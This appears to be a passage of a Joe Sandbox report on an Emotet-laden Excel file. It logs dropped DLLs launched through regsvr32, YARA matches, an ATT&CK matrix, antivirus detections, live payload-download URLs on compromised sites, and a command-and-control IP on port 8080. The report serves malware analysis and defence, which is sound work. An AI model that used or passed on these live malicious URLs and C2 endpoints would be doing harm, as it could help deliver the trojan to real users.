                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-38534
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-38877
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003C6F0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1003C6F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10001010 GetModuleHandleW,LoadLibraryW,GetProcAddress,3_2_10001010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10039160 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,3_2_10039160
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10040650 SetUnhandledExceptionFilter,3_2_10040650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10040680 SetUnhandledExceptionFilter,3_2_10040680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003C6F0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1003C6F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003C790 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1003C790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10042790 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10042790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10038D20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10038D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10040650 SetUnhandledExceptionFilter,4_2_10040650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10040680 SetUnhandledExceptionFilter,4_2_10040680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1003C6F0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1003C6F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1003C790 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1003C790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10042790 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_10042790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10038D20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10038D20

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.73.229 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TURzt\TXqeznNbFanh.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KIMRaXPqDerXJoZF\aRgQEkQ.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IyXmToN\lzIgCVr.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TlAadbHyBMqq\YRFxrLtktkh.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetModuleHandleW,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetVersion,RegOpenKeyExW,RegQueryValueExW,ConvertDefaultLocale,ConvertDefaultLocale,RegCloseKey,GetModuleHandleW,EnumResourceLanguagesW,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameW,GetLocaleInfoW,LoadLibraryW,3_2_10025520
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,3_2_100506C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10052DF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetModuleHandleW,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetVersion,RegOpenKeyExW,RegQueryValueExW,ConvertDefaultLocale,ConvertDefaultLocale,RegCloseKey,GetModuleHandleW,EnumResourceLanguagesW,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameW,GetLocaleInfoW,LoadLibraryW,4_2_10025520
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,4_2_100506C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,4_2_10052DF8
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003E420 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_1003E420
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10044E00 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_10044E00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10039160 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,3_2_10039160

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 6.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1245962917.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1247080526.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.948473026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.947931348.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1246205608.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1247188737.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.970233214.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1247115640.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.958523916.0000000000170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.968294741.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1245946731.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1247066276.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.959190688.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1246240752.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.941525793.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting                      		Path Interception111
                      Process Injection                      		1
                      Disable or Modify Tools                      		1
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium13
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory2
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Input Capture                      		Exfiltration Over Bluetooth11
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution                      		Logon Script (Windows)Logon Script (Windows)2
                      Scripting                      		Security Account Manager27
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Standard Port                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                      Obfuscated Files or Information                      		NTDS1
                      Query Registry                      		Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Non-Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                      Masquerading                      		LSA Secrets2
                      Security Software Discovery                      		SSHKeyloggingData Transfer Size Limits23
                      Application Layer Protocol                      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials1
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                      Process Injection                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Hidden Files and Directories                      		Proc Filesystem1
                      Application Window Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32                      		/etc/passwd and /etc/shadow1
                      Remote System Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632542 Sample: allegati_23052022.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 56 Multi AV Scanner detection for domain / URL 2->56 58 Antivirus detection for URL or domain 2->58 60 Found malicious Excel 4.0 Macro 2->60 62 7 other signatures 2->62 7 EXCEL.EXE 7 24 2->7         started        process3 dnsIp4 48 newkano.com 103.45.230.202, 443, 49173 QTSC-AS-VNQuangTrungSoftwareCityDevelopmentCompanyVN Viet Nam 7->48 50 myphamcuatui.com 103.1.238.211, 443, 49175 SUPERDATA-AS-VNSUPERDATA-VN Viet Nam 7->50 52 2 other IPs or domains 7->52 32 C:\Users\user\cusoa4.ocx, PE32+ 7->32 dropped 34 C:\Users\user\cusoa3.ocx, PE32+ 7->34 dropped 36 C:\Users\user\cusoa2.ocx, PE32+ 7->36 dropped 38 6 other malicious files 7->38 dropped 66 Document exploit detected (creates forbidden files) 7->66 68 Document exploit detected (UrlDownloadToFile) 7->68 12 regsvr32.exe 2 7->12         started        16 regsvr32.exe 2 7->16         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        file5 signatures6 process7 file8 40 C:\Windows\...\YRFxrLtktkh.dll (copy), PE32+ 12->40 dropped 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->70 22 regsvr32.exe 12->22         started        42 C:\Windows\...\TXqeznNbFanh.dll (copy), PE32+ 16->42 dropped 25 regsvr32.exe 2 16->25         started        44 C:\Windows\System32\...\lzIgCVr.dll (copy), PE32+ 18->44 dropped 28 regsvr32.exe 18->28         started        46 C:\Windows\System32\...\aRgQEkQ.dll (copy), PE32+ 20->46 dropped 30 regsvr32.exe 20->30         started        signatures9 process10 dnsIp11 64 System process connects to network (likely due to code injection or exploit) 22->64 54 165.22.73.229, 49177, 49179, 49180 DIGITALOCEAN-ASNUS United States 25->54 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4bP[1].dll10%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nB5U[1].dll10%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LeBuXD3cUkeiPrfy[1].dll10%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\QqHRFPCw2sMluT[1].dll10%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\cusoa1.ocx10%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\cusoa2.ocx10%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\cusoa3.ocx10%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\cusoa4.ocx10%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\IyXmToN\lzIgCVr.dll (copy)10%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\KIMRaXPqDerXJoZF\aRgQEkQ.dll (copy)10%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\TURzt\TXqeznNbFanh.dll (copy)10%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\TlAadbHyBMqq\YRFxrLtktkh.dll (copy)10%ReversingLabsWin64.Trojan.Emotet

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.regsvr32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.140000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      9.2.regsvr32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      10.2.regsvr32.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      4.2.regsvr32.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      3.2.regsvr32.exe.140000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      7.2.regsvr32.exe.170000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      8.2.regsvr32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      newkano.com9%VirustotalBrowse
                      myphamcuatui.com4%VirustotalBrowse
                      ocalogullari.com9%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocalogullari.com/inc/Wcm82enrs8/100%Avira URL Cloudmalware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://newkano.com/wp-admin/66rIsrVwoPKUsjcAs/100%Avira URL Cloudmalware
                      https://myphamcuatui.com/assets/OPVeVSpO/100%Avira URL Cloudmalware
                      https://165.22.73.229:8080/h0%Avira URL Cloudsafe
                      https://165.22.73.229/q0%Avira URL Cloudsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/100%Avira URL Cloudmalware
                      https://165.22.73.229/p0%Avira URL Cloudsafe
                      https://165.22.73.229:8080/0%URL Reputationsafe
                      https://165.22.73.229/0%Avira URL Cloudsafe
                      https://165.22.73.229/y0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://165.22.73.229:8080/x0%Avira URL Cloudsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://165.22.73.229:8080/Q0%Avira URL Cloudsafe
                      https://165.22.73.229/d0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      newkano.com
                      		103.45.230.202
                      		truetrueunknown
                      myphamcuatui.com
                      		103.1.238.211
                      		truefalseunknown
                      ocalogullari.com
                      		188.132.217.108
                      		truefalseunknown
                      sieuthiphutungxenang.com
                      		112.213.89.85
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://ocalogullari.com/inc/Wcm82enrs8/true
                        • Avira URL Cloud: malware
                        		unknown
                        https://newkano.com/wp-admin/66rIsrVwoPKUsjcAs/true
                        • Avira URL Cloud: malware
                        		unknown
                        https://myphamcuatui.com/assets/OPVeVSpO/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/true
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://165.22.73.229:8080/hregsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://165.22.73.229/qregsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://165.22.73.229/pregsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://165.22.73.229:8080/regsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://165.22.73.229/regsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://165.22.73.229/yregsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://165.22.73.229:8080/xregsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://165.22.73.229:8080/Qregsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://165.22.73.229/dregsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              112.213.89.85
                              		sieuthiphutungxenang.comViet Nam
                              		45544SUPERDATA-AS-VNSUPERDATA-VNfalse
                              103.45.230.202
                              		newkano.comViet Nam
                              		24085QTSC-AS-VNQuangTrungSoftwareCityDevelopmentCompanyVNtrue
                              165.22.73.229
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              103.1.238.211
                              		myphamcuatui.comViet Nam
                              		45544SUPERDATA-AS-VNSUPERDATA-VNfalse
                              188.132.217.108
                              		ocalogullari.comTurkey
                              		42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRfalse

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:632542
                              Start date and time: 23/05/202218:58:022022-05-23 18:58:02 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:allegati_23052022.xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@17/18@4/5
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 86.2% (good quality ratio 75.3%)
                              • Quality average: 71.1%
                              • Quality standard deviation: 34.2%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 24
                              • Number of non-executed functions: 298
